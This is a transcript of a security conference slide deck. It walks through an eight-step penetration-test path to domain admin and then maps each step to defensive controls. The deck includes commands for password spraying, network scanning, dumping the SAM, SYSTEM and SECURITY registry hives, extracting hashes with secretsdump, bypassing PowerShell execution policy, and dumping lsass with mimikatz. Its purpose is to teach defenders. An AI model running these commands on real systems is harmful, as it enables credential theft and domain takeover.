Stealing Domain Admin (or How I Learned to Stop Worrying and Love the CSSF)

Transcript

1. STEALING DOMAIN ADMIN (OR HOW I LEARNED TO STOP WORRYING

   AND LOVE THE CSSF) JEROD BRENNEN

2. WHO AM I?  Jerod Brennen  Security Solutions Architect,

   One Identity  Alphabet Soup  ACE, CISSP, GWAPT, GWEB

3. THE CHALLENGE

4. HANDBASKETS, ANYONE?

5. LET’S PLAY FIND THE WHITESPACE From http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/

6. BROKEN RECORD… BROKEN RECORD… BROKEN RECORD…

7. CHOOSE YOUR OWN ADVENTURE

8. PEN TEST FLOW

9. TEN EIGHT STEP PROGRAM  Step 1: Gather OSINT 

   Step 2: Score Some Creds  Step 3: Logon to an Internal System  Step 4: Dump SAM/System/Security Hives  Step 5: Extract Hashes and Get Cracking  Step 6: Identify Admin Accounts  Step 7: Find Active DA Logins  Step 8: Pass the Hash

10. STEP 1: GATHER OSINT (OPEN SOURCE INTELLIGENCE)  Google search

     site:company_website.com “contact”  Maltego  https://www.paterva.com/  Transform: To Email Address [using Search Engine]  LinkedIn company search  Data.com Connect  https://connect.data.com/  EmailHarvester  https://github.com/maldevel/EmailHarvester  Discover (Lee Baird)  https://github.com/leebaird/discover

11. STEP 2: SCORE SOME CREDS  Brute Force Attack 

    Lots of usernames, lots of passwords  Password Spray Attack  Lots of usernames, VERY few passwords  ./ntlm-botherer.py –U ./users.txt –p Winter2018 –d target_domain.com https://webdir2a.online.lync.com/Autodiscover/AutodiscoverService.svc/root/oauth /user?originalDomain=target_domain.com/WebTicket/WebTicketService.svc  Burp Suite Intruder / Cluster Bomb  https://portswigger.net/burp/help/intruder_using.html  https://portswigger.net/burp/help/intruder_positions.html  MailSniper  https://github.com/dafthack/MailSniper

12. STEP 3: LOGON TO AN INTERNAL SYSTEM  Passive Intel

     Shodan - https://shodan.io/  Censys - https://censys.io/  Search Engines  site:company.com inurl:login  site:company.com sitemap.xml  Active Intel  nmap -Pn -sS xxx.xxx.xxx.0/24 -p 21- 23,80,443,3389,5800,5900,8443  Remote Administration Tools  Bomgar, GoToMeeting, TeamViewer, Join.me, Splashtop, LogMeIn, WebEx  Physical/Wireless Network Access

13. STEP 4: DUMP SAM/SYSTEM/SECURITY HIVES  Dump the hives 

    reg.exe save hklm\sam c:\sam.save  reg.exe save hklm\system c:\system.save  reg.exe save hklm\security c:\security.save  This one may require elevated privileges  If so, psexec.exe -i -s cmd.exe, then execute within new command prompt window  While you’re there, scope out users & groups  net user /domain > domain_users.txt  net groups /domain > domain_groups.txt  Exfiltrate  Box, Dropbox, Google Drive, OneDrive, ShareFile

14. STEP 5: EXTRACT HASHES AND GET CRACKING  Extract hashes

    with Impacket (offline)  https://github.com/CoreSecurity/impacket  secretsdump.py -sam sam.save -security security.save -system system.save LOCAL  Crack SAM hashes  LM -> Ophcrack  NT -> hashcat or John the Ripper  HashKiller  https://hashkiller.co.uk/ntlm-decrypter.aspx  Crack domain creds  hashcat or John the Ripper

15. STEP 6: IDENTIFY ADMIN ACCOUNTS  Impacket output  Administrator

    = RID -500 (“the dash 500 account”)  Verify Local Admins  net localgroup administrators  Dump Active Directory  AD Users and Computers  Apache Directory Studio  Softerra LDAP Administrator/Browser  LDAP Admin (portable?)

16. STEP 7: FIND ACTIVE DA LOGINS  PowerShell Empire 

    https://github.com/PowerShellMafia/PowerSploit  https://github.com/PowerShellMafia/PowerSploit/tree/m aster/Recon  Invoke-UserHunter  Input options  Individual username  List of usernames  Domain group  List of hosts  PowerShell ProTip  powershell -exec bypass

17. STEP 8: PASS THE HASH  Invoke-TheHash  https://github.com/Kevin-Robertson/Invoke-TheHash 

    Dump lsass (Local Security Authority Subsystem Service)  Start > Run > taskmgr.exe  Show processes from all users  lsass.exe > Right Click > Dump  c:\Users\username\AppData\Local\Temp\lsass.DMP  Grab passwords from lsass  Online -> procdump.exe  https://technet.microsoft.com/en- us/sysinternals/dd996900.aspx  Offline -> mimikatz  https://github.com/gentilkiwi/mimikatz

18. STEP 9: CELEBRATE (OPTIONAL)

19. NOTHING NEW UNDER THE SUN  Dumping Windows Credentials (December

    20, 2013)  https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/  I Hunt Sys Admins (January 19, 2015)  http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/  Password Spraying Outlook Web Access (February 17, 2016)  http://www.blackhillsinfosec.com/?p=4694

20. WHAT IF I TOLD YOU…

21. SIMPLICITY IS KEY

22. COMMON SENSE SECURITY FRAMEWORK  Seven (7) Areas of Protection

     Protect Your Applications  Protect Your Endpoints  Protect Your Network  Protect Your Servers  Protect Your Data  Protect Your Locations  Protect Your People  Three (3) Yes/No Questions per Area  Guidance (free, open source, commercial) https://commonsenseframework.org/

23. WHO DOESN’T LOVE SPREADSHEETS?

24. WHO DOESN’T LOVE GRAPHS?

25. EVERY BREATH YOU TAKE… EVERY MOVE YOU MAKE… Step Control

    Gather OSINT S01 - Do you follow documented system hardening procedures to secure your servers? Score Some Creds D02 - Do you periodically review employee account security to ensure that access is appropriate (i.e., least privilege, individuals accounts, strong passwords)? Logon to an Internal System N03 - Do you require two factor authentication for remote/VPN access, as well as access to third party (hosted) applications? Dump SAM/System/Security Hives S02 - Do you centrally store and actively monitor critical security logs for suspicious events (such as abnormal admin account activity)? Extract Hashes and Get Cracking See S02 Identify Admin Accounts E02 - Do you limit local administrator account usage? Find Active DA Logins See S02 Pass the Hash See S02

26. UNSUNG HERO

27. A FEW FINAL COMMENTS

28. LEADERSHIP NEEDS CONTEXT  Information Security Spending Will Top $101

    Billion By 2020  http://www.darkreading.com/operations/information-security-spending-will-top-$101-billion-by-2020/d/d-id/1327178  World's Biggest Data Breaches  http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/  Privacy Rights Clearinghouse's Chronology of Data Breaches  https://www.privacyrights.org/data-breaches  Verizon Data Breach Investigations Report (DBIR)  http://www.verizonenterprise.com/verizon-insights-lab/dbir/

29. YOUR HOMEWORK  Self-assess your organization against the CSSF 

    Schedule a red team / blue team exercise using these steps as a guide  Post mortem the exercise  Update policies, procedures, and standards based on the post mortem  Site down with leadership (steering committee) and share what you learned  Fix all the things!

30. QUESTIONS / COMMENTS / DISCUSSION

31. CONTACT INFO  Email – [email protected]  LinkedIn - https://www.linkedin.com/in/slandail/

     Twitter - https://twitter.com/slandail  GitHub - https://github.com/slandail  SlideShare - https://www.slideshare.net/JerodBrennenCISSP  Speaker Deck - https://speakerdeck.com/slandail/